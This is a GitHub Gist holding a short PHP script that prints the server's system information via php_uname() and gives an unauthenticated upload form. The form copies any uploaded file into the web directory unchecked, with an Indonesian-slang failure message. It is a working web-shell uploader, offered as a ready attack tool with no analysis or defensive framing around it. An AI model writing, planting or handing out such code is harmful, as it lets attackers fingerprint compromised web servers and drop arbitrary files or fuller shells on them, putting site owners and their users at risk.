Created
July 5, 2020 03:51
-
-
Save jagoanbangetz/049876b180d52937f1579fbb5d156869 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| echo 'System: <font color="black" id="system_info">galehdotid#'.php_uname().'#</font><br>'; | |
| echo"<br><form method=post enctype=multipart/form-data>"; | |
| echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>"; | |
| if($_POST["k"]==upload) { | |
| if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])) { | |
| echo"<b>".$_FILES["f"]["name"]; | |
| } else { | |
| echo"<b>Gagal upload cok"; | |
| } | |
| } | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment